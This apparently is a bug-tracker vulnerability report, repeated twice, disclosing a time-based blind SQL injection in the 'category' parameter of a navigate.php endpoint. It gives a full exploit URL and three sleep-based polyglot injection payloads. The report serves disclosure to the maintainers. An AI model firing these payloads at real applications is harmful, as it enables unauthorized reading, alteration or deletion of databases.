Expected behaviour
Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category. Impact
Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database.
- Executing commands on the underlying operating system. Steps to reproduce
Inject payload on the category via request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items
Payload: (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
Payload: (select(0)from(select(sleep(10)))v)/'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"/
Payload: (select(0)from(select(sleep(20)))v)/'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
The text was updated successfully, but these errors were encountered:
Expected behaviour



Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category.
Impact
Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database.
- Executing commands on the underlying operating system.
Steps to reproduce
Inject payload on the category via request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items
Payload: (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
Payload: (select(0)from(select(sleep(10)))v)/'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"/
Payload: (select(0)from(select(sleep(20)))v)/'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
The text was updated successfully, but these errors were encountered: